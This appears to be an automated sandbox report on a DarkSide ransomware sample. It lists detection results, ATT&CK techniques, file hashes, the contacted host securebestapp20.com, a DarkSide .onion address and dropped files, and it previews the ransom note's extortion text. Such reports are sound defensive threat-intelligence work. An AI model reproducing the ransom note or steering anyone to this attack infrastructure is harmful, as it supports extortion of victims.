                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        rUUR0qQI22.exe93%ReversingLabsWin32.Ransomware.DarkSide
                        rUUR0qQI22.exe100%AviraTR/Crypt.XPACK.Gen
                        rUUR0qQI22.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        0.0.rUUR0qQI22.exe.ce0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        0.2.rUUR0qQI22.exe.ce0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        https://go.micro0%URL Reputationsafe
                        https://go.micro0%URL Reputationsafe
                        https://go.micro0%URL Reputationsafe
                        http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT0%Avira URL Cloudsafe
                        https://securebestapp20.com/jVPuJOnhRSBlO0%Avira URL Cloudsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        https://securebestapp20.com/jVPuJOnhRSBl0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        securebestapp20.com
                        185.105.109.19
                        truefalse
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmpfalse
                            high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmpfalse
                              high
                              https://go.micropowershell.exe, 00000006.00000002.282581454.000001658117D000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRTREADME.418990b0.TXT.0.drtrue
                              • Avira URL Cloud: safe
                              unknown
                              https://securebestapp20.com/jVPuJOnhRSBlOrUUR0qQI22.exe, 00000000.00000002.431628037.00000000038C0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://contoso.com/powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmpfalse
                                high
                                https://contoso.com/Licensepowershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://torproject.org/README.418990b0.TXT.0.drfalse
                                  high
                                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.279994844.0000016580001000.00000004.00000001.sdmpfalse
                                    high
                                    https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmpfalse
                                      high
                                      https://securebestapp20.com/jVPuJOnhRSBlrUUR0qQI22.exe, 00000000.00000002.431464752.0000000003855000.00000004.00000001.sdmp, rUUR0qQI22.exe, 00000000.00000002.431628037.00000000038C0000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.105.109.19
                                      securebestapp20.comRussian Federation
                                      210079EUROBYTEEurobyteLLCMoscowRussiaRUfalse

                                      Private

                                      IP
                                      192.168.2.1

                                      General Information

                                      Joe Sandbox Version:32.0.0 Black Diamond
                                      Analysis ID:401962
                                      Start date:01.05.2021
                                      Start time:05:59:58
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 7m 17s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:rUUR0qQI22 (renamed file extension from none to exe)
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:34
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.rans.spyw.evad.winEXE@6/10@1/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 100% (good quality ratio 94.4%)
                                      • Quality average: 80.9%
                                      • Quality standard deviation: 27.3%
                                      HCA Information:
                                      • Successful, ratio: 52%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      Warnings:
                                      Show All
                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, VSSVC.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.43.193.48, 93.184.220.29, 23.218.209.198, 92.122.145.220, 40.88.32.150, 52.255.188.83, 23.218.208.56, 20.82.210.154, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129
                                      • Excluded domains from analysis (whitelisted): 224.2.168.192.in-addr.arpa, 164.2.168.192.in-addr.arpa, 155.2.168.192.in-addr.arpa, 53.2.168.192.in-addr.arpa, 215.2.168.192.in-addr.arpa, 35.2.168.192.in-addr.arpa, 189.2.168.192.in-addr.arpa, 9.2.168.192.in-addr.arpa, 233.2.168.192.in-addr.arpa, 105.2.168.192.in-addr.arpa, 62.2.168.192.in-addr.arpa, 249.2.168.192.in-addr.arpa, 26.2.168.192.in-addr.arpa, 2.2.168.192.in-addr.arpa, 139.2.168.192.in-addr.arpa, dual-a-0001.a-msedge.net, 180.2.168.192.in-addr.arpa, 19.2.168.192.in-addr.arpa, 112.2.168.192.in-addr.arpa, 130.2.168.192.in-addr.arpa, skypedataprdcolcus15.cloudapp.net, 80.2.168.192.in-addr.arpa, 96.2.168.192.in-addr.arpa, 208.2.168.192.in-addr.arpa, 146.2.168.192.in-addr.arpa, 173.2.168.192.in-addr.arpa, 69.2.168.192.in-addr.arpa, 196.2.168.192.in-addr.arpa, 242.2.168.192.in-addr.arpa, 123.2.168.192.in-addr.arpa, 162.2.168.192.in-addr.arpa, 141.2.168.192.in-addr.arpa, 201.2.168.192.in-addr.arpa, 187.2.168.192.in-addr.arpa, 238.2.168.192.in-addr.arpa, 55.2.168.192.in-addr.arpa, 60.2.168.192.in-addr.arpa, 153.2.168.192.in-addr.arpa, 191.2.168.192.in-addr.arpa, 28.2.168.192.in-addr.arpa, arc.trafficmanager.net, 226.2.168.192.in-addr.arpa, 103.2.168.192.in-addr.arpa, 247.2.168.192.in-addr.arpa, 4.2.168.192.in-addr.arpa, 137.2.168.192.in-addr.arpa, 10.2.168.192.in-addr.arpa, 114.2.168.192.in-addr.arpa, 251.2.168.192.in-addr.arpa, 17.2.168.192.in-addr.arpa, 33.2.168.192.in-addr.arpa, 78.2.168.192.in-addr.arpa, 94.2.168.192.in-addr.arpa, 71.2.168.192.in-addr.arpa, 213.2.168.192.in-addr.arpa, 21.2.168.192.in-addr.arpa, 148.2.168.192.in-addr.arpa, 175.2.168.192.in-addr.arpa, 125.2.168.192.in-addr.arpa, 240.2.168.192.in-addr.arpa, 67.2.168.192.in-addr.arpa, 44.2.168.192.in-addr.arpa, 82.2.168.192.in-addr.arpa, 198.2.168.192.in-addr.arpa, 219.2.168.192.in-addr.arpa, 91.2.168.192.in-addr.arpa, arc.msn.com.nsatc.net, 159.2.168.192.in-addr.arpa, 32.2.168.192.in-addr.arpa, 236.2.168.192.in-addr.arpa, 185.2.168.192.in-addr.arpa, 74.2.168.192.in-addr.arpa, 39.2.168.192.in-addr.arpa, 254.2.168.192.in-addr.arpa, 168.2.168.192.in-addr.arpa, ocsp.digicert.com, 212.2.168.192.in-addr.arpa, 83.2.168.192.in-addr.arpa, 89.2.168.192.in-addr.arpa, 109.2.168.192.in-addr.arpa, watson.telemetry.microsoft.com, 41.2.168.192.in-addr.arpa, 228.2.168.192.in-addr.arpa, 245.2.168.192.in-addr.arpa, 100.2.168.192.in-addr.arpa, 116.2.168.192.in-addr.arpa, 50.2.168.192.in-addr.arpa, 142.2.168.192.in-addr.arpa, 177.2.168.192.in-addr.arpa, 204.2.168.192.in-addr.arpa, 161.2.168.192.in-addr.arpa, 230.2.168.192.in-addr.arpa, 135.2.168.192.in-addr.arpa, 57.2.168.192.in-addr.arpa, 127.2.168.192.in-addr.arpa, 15.2.168.192.in-addr.arpa, 192.2.168.192.in-addr.arpa, 150.2.168.192.in-addr.arpa, store-images.s-microsoft.com, 6.2.168.192.in-addr.arpa, 46.2.168.192.in-addr.arpa, 65.2.168.192.in-addr.arpa, 183.2.168.192.in-addr.arpa, 243.2.168.192.in-addr.arpa, 30.2.168.192.in-addr.arpa, 157.2.168.192.in-addr.arpa, 217.2.168.192.in-addr.arpa, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, 37.2.168.192.in-addr.arpa, 111.2.168.192.in-addr.arpa, 76.2.168.192.in-addr.arpa, 107.2.168.192.in-addr.arpa, 166.2.168.192.in-addr.arpa, 170.2.168.192.in-addr.arpa, 210.2.168.192.in-addr.arpa, img-prod-cms-rt-microsoft-com.akamaized.net, 85.2.168.192.in-addr.arpa, 120.2.168.192.in-addr.arpa, 24.2.168.192.in-addr.arpa, 87.2.168.192.in-addr.arpa, 118.2.168.192.in-addr.arpa, 179.2.168.192.in-addr.arpa, 221.2.168.192.in-addr.arpa, 52.2.168.192.in-addr.arpa, 59.2.168.192.in-addr.arpa, 133.2.168.192.in-addr.arpa, skypedataprdcoleus17.cloudapp.net, 194.2.168.192.in-addr.arpa, 232.2.168.192.in-addr.arpa, a-0001.a-afdentry.net.trafficmanager.net, 13.2.168.192.in-addr.arpa, 98.2.168.192.in-addr.arpa, 129.2.168.192.in-addr.arpa, 144.2.168.192.in-addr.arpa, 206.2.168.192.in-addr.arpa, e16646.dscg.akamaiedge.net, 8.2.168.192.in-addr.arpa, 48.2.168.192.in-addr.arpa, 63.2.168.192.in-addr.arpa, 70.2.168.192.in-addr.arpa, 86.2.168.192.in-addr.arpa, 181.2.168.192.in-addr.arpa, 138.2.168.192.in-addr.arpa, 11.2.168.192.in-addr.arpa, 1.2.168.192.in-addr.arpa, 250.2.168.192.in-addr.arpa, 18.2.168.192.in-addr.arpa, fs-wildcard.microsoft.com.edgekey.net, 113.2.168.192.in-addr.arpa, skypedataprdcoleus15.cloudapp.net, 20.2.168.192.in-addr.arpa, 95.2.168.192.in-addr.arpa, 207.2.168.192.in-addr.arpa, 147.2.168.192.in-addr.arpa, 172.2.168.192.in-addr.arpa, 68.2.168.192.in-addr.arpa, 241.2.168.192.in-addr.arpa, 122.2.168.192.in-addr.arpa, 197.2.168.192.in-addr.arpa, www.bing.com, 223.2.168.192.in-addr.arpa, 45.2.168.192.in-addr.arpa, 200.2.168.192.in-addr.arpa, ris-prod.trafficmanager.net, 165.2.168.192.in-addr.arpa, 216.2.168.192.in-addr.arpa, storeedgefd.dsx.mp.microsoft.com.edgekey.net, 54.2.168.192.in-addr.arpa, 239.2.168.192.in-addr.arpa, 131.2.168.192.in-addr.arpa, ris.api.iris.microsoft.com, 77.2.168.192.in-addr.arpa, 188.2.168.192.in-addr.arpa, 234.2.168.192.in-addr.arpa, 34.2.168.192.in-addr.arpa, 154.2.168.192.in-addr.arpa, 27.2.168.192.in-addr.arpa, 61.2.168.192.in-addr.arpa, 104.2.168.192.in-addr.arpa, 199.2.168.192.in-addr.arpa, 136.2.168.192.in-addr.arpa, 93.2.168.192.in-addr.arpa, 79.2.168.192.in-addr.arpa, storeedgefd.xbetservices.akadns.net, 115.2.168.192.in-addr.arpa, 252.2.168.192.in-addr.arpa, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, 72.2.168.192.in-addr.arpa, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, 209.2.168.192.in-addr.arpa, 16.2.168.192.in-addr.arpa, 174.2.168.192.in-addr.arpa, 214.2.168.192.in-addr.arpa, 149.2.168.192.in-addr.arpa, 124.2.168.192.in-addr.arpa, 22.2.168.192.in-addr.arpa, 43.2.168.192.in-addr.arpa, prod.fs.microsoft.com.akadns.net, 81.2.168.192.in-addr.arpa, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, 163.2.168.192.in-addr.arpa, 202.2.168.192.in-addr.arpa, 237.2.168.192.in-addr.arpa, 186.2.168.192.in-addr.arpa, 152.2.168.192.in-addr.arpa, 190.2.168.192.in-addr.arpa, 225.2.168.192.in-addr.arpa, 102.2.168.192.in-addr.arpa, 140.2.168.192.in-addr.arpa, 29.2.168.192.in-addr.arpa, displaycatalog-rp.md.mp.microsoft.com.akadns.net, 248.2.168.192.in-addr.arpa, 117.2.168.192.in-addr.arpa, cs9.wac.phicdn.net, 23.2.168.192.in-addr.arpa, 5.2.168.192.in-addr.arpa, 143.2.168.192.in-addr.arpa, 160.2.168.192.in-addr.arpa, 203.2.168.192.in-addr.arpa, 134.2.168.192.in-addr.arpa, 110.2.168.192.in-addr.arpa, 56.2.168.192.in-addr.arpa, 14.2.168.192.in-addr.arpa, 151.2.168.192.in-addr.arpa, 126.2.168.192.in-addr.arpa, 193.2.168.192.in-addr.arpa, 99.2.168.192.in-addr.arpa, www-bing-com.dual-a-0001.a-msedge.net, 220.2.168.192.in-addr.arpa, 176.2.168.192.in-addr.arpa, 47.2.168.192.in-addr.arpa, 101.2.168.192.in-addr.arpa, 66.2.168.192.in-addr.arpa, 158.2.168.192.in-addr.arpa, fs.microsoft.com, 184.2.168.192.in-addr.arpa, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, 73.2.168.192.in-addr.arpa, 38.2.168.192.in-addr.arpa, 31.2.168.192.in-addr.arpa, 92.2.168.192.in-addr.arpa, 235.2.168.192.in-addr.arpa, 253.2.168.192.in-addr.arpa, 169.2.168.192.in-addr.arpa, blobcollector.events.data.trafficmanager.net, 211.2.168.192.in-addr.arpa, 42.2.168.192.in-addr.arpa, 84.2.168.192.in-addr.arpa, 227.2.168.192.in-addr.arpa, 108.2.168.192.in-addr.arpa, 246.2.168.192.in-addr.arpa, storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, 25.2.168.192.in-addr.arpa, 178.2.168.192.in-addr.arpa, 88.2.168.192.in-addr.arpa, 222.2.168.192.in-addr.arpa, 205.2.168.192.in-addr.arpa, store-images.s-microsoft.com-c.edgekey.net, 119.2.168.192.in-addr.arpa, 231.2.168.192.in-addr.arpa, 51.2.168.192.in-addr.arpa, a1449.dscg2.akamai.net, 58.2.168.192.in-addr.arpa, 97.2.168.192.in-addr.arpa, 128.2.168.192.in-addr.arpa, 132.2.168.192.in-addr.arpa, 12.2.168.192.in-addr.arpa, 145.2.168.192.in-addr.arpa, 195.2.168.192.in-addr.arpa, displaycatalog.mp.microsoft.com, 7.2.168.192.in-addr.arpa, 49.2.168.192.in-addr.arpa, 64.2.168.192.in-addr.arpa, 121.2.168.192.in-addr.arpa, 90.2.168.192.in-addr.arpa, 182.2.168.192.in-addr.arpa, 244.2.168.192.in-addr.arpa, 218.2.168.192.in-addr.arpa, 156.2.168.192.in-addr.arpa, e1723.g.akamaiedge.net, 36.2.168.192.in-addr.arpa, 75.2.168.192.in-addr.arpa, 106.2.168.192.in-addr.arpa, 229.2.168.192.in-addr.arpa, 40.2.168.192.in-addr.arpa, 167.2.168.192.in-addr.arpa, 171.2.168.192.in-addr.arpa
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/401962/sample/rUUR0qQI22.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      06:01:19API Interceptor28x Sleep call for process: powershell.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      185.105.109.195WIxZYV73V.exeGet hashmaliciousBrowse
                                        0anROWjIhR.exeGet hashmaliciousBrowse
                                          fast.exeGet hashmaliciousBrowse
                                            WVaiL4J4cc.exeGet hashmaliciousBrowse
                                              ULnza04Oz3.exeGet hashmaliciousBrowse
                                                win_encryptor.exeGet hashmaliciousBrowse
                                                  ai.exeGet hashmaliciousBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    securebestapp20.com5WIxZYV73V.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19
                                                    0anROWjIhR.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19
                                                    fast.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19
                                                    WVaiL4J4cc.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19
                                                    ULnza04Oz3.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19
                                                    win_encryptor.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19
                                                    ai.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    EUROBYTEEurobyteLLCMoscowRussiaRUscan_DHL39382493.exeGet hashmaliciousBrowse
                                                    • 185.105.109.34
                                                    3UiiwuZ4YR.exeGet hashmaliciousBrowse
                                                    • 95.142.44.135
                                                    5WIxZYV73V.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19
                                                    0anROWjIhR.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19
                                                    fast.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19
                                                    kinsing2Get hashmaliciousBrowse
                                                    • 185.154.53.140
                                                    kinsingGet hashmaliciousBrowse
                                                    • 185.154.53.140
                                                    WVaiL4J4cc.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19
                                                    iEchB4J2pv.exeGet hashmaliciousBrowse
                                                    • 185.154.54.5
                                                    ULnza04Oz3.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19
                                                    win_encryptor.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19
                                                    http://ukronet.ru/image/cabinet.exeGet hashmaliciousBrowse
                                                    • 46.30.45.120
                                                    ai.exeGet hashmaliciousBrowse
                                                    • 185.105.109.19

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\README.418990b0.TXT
                                                    Process:C:\Users\user\Desktop\rUUR0qQI22.exe
                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1969
                                                    Entropy (8bit):5.490684818423462
                                                    Encrypted:false
                                                    SSDEEP:48:L7EZWCOqZGgQx8N3NbS/3TXWaPdP4BuWIYiEkVRGHE:LAMCMxq3NbS/rBPdQBuGGv7
                                                    MD5:65494EA6831E577D82FAC2B91B9C3D43
                                                    SHA1:5C23717D22EE9B94306F2D5A2A53C60ACA03EB8C
                                                    SHA-256:5E98B41A51606E16DDA30AD4A49457227F75D71AD2004E2942C6B8DE6202C4F3
                                                    SHA-512:28BA13F7793AC8271AF03B26EAEBA6CBE707BF1F07FB1792818A6AB270D1C20D0091EF4A10C092F60C373AEFE09698D2B470EC6A7F8CFA47103FD8BBB8D7A7BB
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.418990b0.TXT, Author: Joe Security
                                                    • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.418990b0.TXT, Author: Joe Security
                                                    • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.418990b0.TXT, Author: Joe Security
                                                    Reputation:low
                                                    Preview: ----------- [ Welcome to DarkSide ] -------------> .. .. What happend? .. ---------------------------------------------- .. Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. .. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. .. Follow our instructions below and you will recover all your data. .. .. What guarantees? .. ---------------------------------------------- .. We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. .. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. .. We guarantee to decrypt one file for free. Go to the site and contact us. .. .. How to get access on website? .. ---------------------------------------------- .. Using a TOR browser: .. 1) Download and i
                                                    C:\Recovery\README.418990b0.TXT
                                                    Process:C:\Users\user\Desktop\rUUR0qQI22.exe
                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1969
                                                    Entropy (8bit):5.490684818423462
                                                    Encrypted:false
                                                    SSDEEP:48:L7EZWCOqZGgQx8N3NbS/3TXWaPdP4BuWIYiEkVRGHE:LAMCMxq3NbS/rBPdQBuGGv7
                                                    MD5:65494EA6831E577D82FAC2B91B9C3D43
                                                    SHA1:5C23717D22EE9B94306F2D5A2A53C60ACA03EB8C
                                                    SHA-256:5E98B41A51606E16DDA30AD4A49457227F75D71AD2004E2942C6B8DE6202C4F3
                                                    SHA-512:28BA13F7793AC8271AF03B26EAEBA6CBE707BF1F07FB1792818A6AB270D1C20D0091EF4A10C092F60C373AEFE09698D2B470EC6A7F8CFA47103FD8BBB8D7A7BB
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: ----------- [ Welcome to DarkSide ] -------------> .. .. What happend? .. ---------------------------------------------- .. Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. .. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. .. Follow our instructions below and you will recover all your data. .. .. What guarantees? .. ---------------------------------------------- .. We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. .. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. .. We guarantee to decrypt one file for free. Go to the site and contact us. .. .. How to get access on website? .. ---------------------------------------------- .. Using a TOR browser: .. 1) Download and i
                                                    C:\Users\README.418990b0.TXT
                                                    Process:C:\Users\user\Desktop\rUUR0qQI22.exe
                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):1969
                                                    Entropy (8bit):5.490684818423462
                                                    Encrypted:false
                                                    SSDEEP:48:L7EZWCOqZGgQx8N3NbS/3TXWaPdP4BuWIYiEkVRGHE:LAMCMxq3NbS/rBPdQBuGGv7
                                                    MD5:65494EA6831E577D82FAC2B91B9C3D43
                                                    SHA1:5C23717D22EE9B94306F2D5A2A53C60ACA03EB8C
                                                    SHA-256:5E98B41A51606E16DDA30AD4A49457227F75D71AD2004E2942C6B8DE6202C4F3
                                                    SHA-512:28BA13F7793AC8271AF03B26EAEBA6CBE707BF1F07FB1792818A6AB270D1C20D0091EF4A10C092F60C373AEFE09698D2B470EC6A7F8CFA47103FD8BBB8D7A7BB
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: ----------- [ Welcome to DarkSide ] -------------> .. .. What happend? .. ---------------------------------------------- .. Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. .. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. .. Follow our instructions below and you will recover all your data. .. .. What guarantees? .. ---------------------------------------------- .. We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. .. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. .. We guarantee to decrypt one file for free. Go to the site and contact us. .. .. How to get access on website? .. ---------------------------------------------- .. Using a TOR browser: .. 1) Download and i
                                                    C:\Users\user\AppData\Local\418990b0.ico
                                                    Process:C:\Users\user\Desktop\rUUR0qQI22.exe
                                                    File Type:MS Windows icon resource - 5 icons, 64x64, 32 bits/pixel, 48x48, 32 bits/pixel
                                                    Category:dropped
                                                    Size (bytes):34494
                                                    Entropy (8bit):3.274622648924063
                                                    Encrypted:false
                                                    SSDEEP:192:gbjP3AlUfsjVX50pzKOMkbD0NY3dIZJJw:8jP3Aufsj7cOTkvIZJW
                                                    MD5:4F57D54D01CCBDAF3EBFAC3EC0AC3FD7
                                                    SHA1:BC529DC03674D08D64D8442C4E1D1A3E3464E953
                                                    SHA-256:28B6841AA125225CD01BE09FBD2F1D7B3C2102D9FFC7DC8546700E67C2A6E3BC
                                                    SHA-512:BA9F779C0066EBEC8E555276AFBC862456B083138F8EB512CAE50B431EBE32C74C0A5EFB4E99F995BCFCBAEC2B71E242984FDD5084561940E741F1CAC1D6C246
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: ......@@.... .(B..V...00.... ..%..~B.. .... .....&h........ ......x........ .h...V...(...@......... ......B..............................................................................................................................222.222.222.222.222.222.222.222.222.222.................................................................................................................................................................................................222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.................................................................................................................................................................222.....222.222.222.222.222.222.222.222.222 222+22222222222+222 222.222.222.222.222.222.222.222.....222.............................................................................................................................................222.222.222.222.222.222.222.222.222=222v22
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.9260988789684415
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllulb/lj:NllUb/l
                                                    MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                    SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                    SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                    SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: @...e................................................@..........
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4ayydvj.e53.ps1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
